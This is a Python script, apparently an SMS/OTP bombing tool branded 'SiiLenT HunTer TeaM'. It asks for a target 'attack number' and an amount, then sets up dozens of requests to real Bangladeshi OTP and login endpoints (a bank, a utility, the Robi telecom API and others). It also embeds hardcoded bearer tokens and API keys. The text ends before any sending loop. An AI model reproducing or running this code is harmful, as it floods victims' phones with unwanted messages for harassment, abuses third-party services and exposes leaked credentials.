
import requests
from requests.structures import CaseInsensitiveDict
import os
print("open")
os.system('clear')



# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White


import os
import sys
 
 
print(bigreen+"""
´´´´´´´´´´´´´´´´´´´ ¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´´´´`
´´´´´´´´´´´´´´´´´¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´´´
´´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´´
´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´`´´´´´´´´´´´¶¶´´´´´´´´´´`
´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´
´´´´´´´´´´´¶¶´¶¶´´´¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´¶¶´¶¶´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶¶¶´´´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶´´´´´´´´´´´´´
´´´´¶¶¶´´´´´´´¶¶´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´¶¶´´´´´´¶¶¶¶´´´
´´´¶¶¶¶¶´´´´´¶¶´´´¶¶¶¶¶¶¶´´´¶¶¶´´´¶¶¶¶¶¶¶´´´¶¶´´´´´¶¶¶¶¶¶´´
´´¶¶´´´¶¶´´´´¶¶´´´´´¶¶¶´´´´¶¶¶¶¶´´´´¶¶¶´´´´´¶¶´´´´¶¶´´´¶¶´´
´¶¶¶´´´´¶¶¶¶´´¶¶´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´¶¶¶¶´´´´¶¶¶´
¶¶´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´¶¶
¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶¶´´´´´´¶¶¶¶¶¶¶¶
´´¶¶¶¶´¶¶¶¶¶´´´´´´¶¶¶¶¶´´´´´´´´´´´´´´¶¶¶´¶¶´´´´´¶¶¶¶¶¶´¶¶¶´
´´´´´´´´´´¶¶¶¶¶¶´´¶¶¶´´¶¶´´´´´´´´´´´¶¶´´¶¶¶´´¶¶¶¶¶¶´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´´´¶¶´¶¶´¶´¶´¶´¶´¶´¶´¶´¶´¶¶´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´¶¶¶¶´´¶´¶´¶´¶´¶´¶´¶´¶´´´¶¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶¶´¶¶´´´¶¶¶¶¶¶¶¶¶¶¶¶¶´´´¶¶´¶¶¶¶¶´´´´´´´´´´´´
´´´´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶´´´´´´´´´´´´´´´´´¶¶´´´´´´¶¶¶¶¶¶¶¶¶´´´´
´´´¶¶´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´´
´´´´¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶´´´´
´´´´´´¶¶´´´¶¶¶´´´´´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´´´´¶¶¶´´´¶¶´´´´´´
´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´´´´´´
´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´´´
 
             
                                  """)




    


  

print ("	 -!-!- WeLcOmE-!-!- (SiiLenT HunTer TeaM ) ")

print ("	 -!-!- WeLcOmE-!-!- ( HD-PuDiNa ) ( @##MrPuD!!Na##@ ) ")




number  = str(input("[>] Hey Mr : PuDiNa Sir. apNar aTTack NumBer DiN: "))


amount = int(input("[>] PuDiNA Sir apNar aTTack ar PoriMaN LikHuN: "))


url1 = "http://nesco.sslwireless.com:80/api/v1/login"

headers1 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/x-www-form-urlencoded"

data1 = "phone_number="+number


url2 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers2 = CaseInsensitiveDict()

headers2["Content-Length"]="48"

headers2["Content-Type"]="application/json;charset=utf-8"

data2 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""





url3 = "https://prodapi.swap.com.bd/api/v1/send-otp/login"

headers3 = CaseInsensitiveDict()

headers3["X-Authorization"]= "QoFN68MGTcosJxSmDf5GCgxXlNcgE1mUH9MUWuDHgs7dugjR7P2ziASzpo3frHL3"

headers3["Content-Type"] = "application/json"

data3 = '{"mobile_number":"'+number+'","referral":false}'

url4 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers4 = CaseInsensitiveDict()

headers4["Content-Type"]="application/json; charset=UTF-8"

data4 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'


url5 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers5 = CaseInsensitiveDict()

headers5["Content-Type"]="application/json; charset=UTF-8"

data5 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'

url6 = "http://nesco.sslwireless.com:80/api/v1/login"

headers6 = CaseInsensitiveDict()
headers6["Content-Type"] = "application/x-www-form-urlencoded"

data6 = "phone_number="+number

url7 = "http://nesco.sslwireless.com:80/api/v1/login"

headers7 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/x-www-form-urlencoded"

data7 = "phone_number="+number


url8 = "http://nesco.sslwireless.com:80/api/v1/login"

headers8 = CaseInsensitiveDict()
headers8["Content-Type"] = "application/x-www-form-urlencoded"

data8 = "phone_number="+number

url9 = "http://nesco.sslwireless.com:80/api/v1/login"

headers9 = CaseInsensitiveDict()
headers9["Content-Type"] = "application/x-www-form-urlencoded"

data9 = "phone_number="+number

url10 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers10 = CaseInsensitiveDict()

headers10["Content-Type"]="application/json; charset=UTF-8"

data10 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'

url11 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers11 = CaseInsensitiveDict()

headers11["Content-Type"]="application/json; charset=UTF-8"

data11 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'


url12 = "https://ss.binge.buzz/otp/send/login"

headers12 = CaseInsensitiveDict()
headers12["Content-Type"] = "application/x-www-form-urlencoded"

data12 = "phone="+number


url13 = "https://ss.binge.buzz/otp/send/login"

headers13 = CaseInsensitiveDict()
headers13["Content-Type"] = "application/x-www-form-urlencoded"

data13 = "phone="+number

url14 = "https://ss.binge.buzz/otp/send/login"

headers14 = CaseInsensitiveDict()
headers14["Content-Type"] = "application/x-www-form-urlencoded"

data14 = "phone="+number
url15 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers15 = CaseInsensitiveDict()
headers15["Content-Type"] = "application/json"

headers15["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"


data15 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8183aaf0-77be-4a77-b9d8-f48767a4265f"}'


url16 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"

url17 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"

url18 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"

url19 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"

url20 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"

url21 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers21 = CaseInsensitiveDict()
headers21["Content-Type"] = "application/json"

headers21["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data21 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8183aaf0-77be-4a77-b9d8-f48767a4265f"}'

url22 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers22 = CaseInsensitiveDict()
headers22["Content-Type"] = "application/json"


headers22["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"


data22 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"b373ffb6-1770-4757-ac63-34da247e3deb"}'



url23 =" https://webapi.robi.com.bd/v1/otp/send_request"

headers23 = CaseInsensitiveDict()

headers23["Content-Type"] = "application/json"

headers23["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data23 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"dd077167-4c05-4173-b9b0-96ecde75c0c1"}'


url24 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers24 = CaseInsensitiveDict()

headers24["Content-Type"] = "application/json"


headers24["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data24 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"30c425a5-cd1d-4359-9a9d-6856bafbe6fa"}'


url25 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers25 = CaseInsensitiveDict()

headers25["Content-Type"] = "application/json"


headers25["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data25 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"5c5d9662-b432-4e83-9882-077ae14226c6"}'

url26 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers26 = CaseInsensitiveDict()


headers26["Content-Type"] = "application/json"


headers26["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data26 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"20b51209-dd23-48e4-b6ad-bb7b1af41021"}'





url27 = "https://webapi.robi.com.bd/v1/otp/send_request"



headers27 = CaseInsensitiveDict()
headers27["Content-Type"] = "application/json"
headers27["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data27 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","ud":"20b51209-dd23-48e4-b6ad-bb7b1af41021"}'

url28 = "https://webapi.robi.com.bd/v1/otp/send_request"






headers28 = CaseInsensitiveDict()

headers28["Content-Type"] = "application/json"


headers28["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"






data28 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8d14bb6e-899c-415d-8090-af1a16bce1af"}'



url29 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers29 = CaseInsensitiveDict()


headers29["Content-Type"] = "application/json"

headers29["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"




data29 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"93f73f0d-2974-43e6-9af8-c8325aa8df3d"}'



url30 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers30 = CaseInsensitiveDict()

headers30["Content-Type"] = "application/json"

headers30["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"




data30 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"b57c2854-8b9d-48d8-abbe-03e0caa28c18"}'





url31 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers31 = CaseInsensitiveDict()


headers31["Content-Type"] = "application/json"


headers31["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data31 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"9358cd85-e111-4fe9-8e61-c8fb013348e4"}'




url32 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers32 = CaseInsensitiveDict()


headers32["Content-Type"] = "application/json"

headers32["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"




data32 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"20b7088f-408a-4c0a-914b-6421a8fa5feb"}'

url33 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers33 = CaseInsensitiveDict()
headers33["Content-Type"] = "application/json"

headers33["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data33 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"8183aaf0-77be-4a77-b9d8-f48767a4265f"}'

url34 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers34 = CaseInsensitiveDict()
headers34["Content-Type"] = "application/json"


headers34["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"


data34 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"b373ffb6-1770-4757-ac63-34da247e3deb"}'



url35 =" https://webapi.robi.com.bd/v1/otp/send_request"

headers35 = CaseInsensitiveDict()

headers35["Content-Type"] = "application/json"

headers35["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data35 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"dd077167-4c05-4173-b9b0-96ecde75c0c1"}'


url36 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers36 = CaseInsensitiveDict()

headers36["Content-Type"] = "application/json"


headers36["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data36 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"30c425a5-cd1d-4359-9a9d-6856bafbe6fa"}'


url37 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers37 = CaseInsensitiveDict()

headers37["Content-Type"] = "application/json"


headers37["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data37 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"5c5d9662-b432-4e83-9882-077ae14226c6"}'

url38 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers38 = CaseInsensitiveDict()


headers38["Content-Type"] = "application/json"


headers38["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data38 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"20b51209-dd23-48e4-b6ad-bb7b1af41021"}'





url39 = "https://webapi.robi.com.bd/v1/otp/send_request"



headers39 = CaseInsensitiveDict()
headers39["Content-Type"] = "application/json"
headers39["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data39 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","ud":"20b51209-dd23-48e4-b6ad-bb7b1af41021"}'

url40 = "https://webapi.robi.com.bd/v1/otp/send_request"






headers40 = CaseInsensitiveDict()

headers40["Content-Type"] = "application/json"


headers40["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"






data40 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"8d14bb6e-899c-415d-8090-af1a16bce1af"}'



url41 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers41 = CaseInsensitiveDict()


headers41["Content-Type"] = "application/json"

headers41["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"




data41 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"93f73f0d-2974-43e6-9af8-c8325aa8df3d"}'



url42 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers42 = CaseInsensitiveDict()

headers42["Content-Type"] = "application/json"

headers42["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"




data42 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"b57c2854-8b9d-48d8-abbe-03e0caa28c18"}'





url43 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers43 = CaseInsensitiveDict()


headers43["Content-Type"] = "application/json"


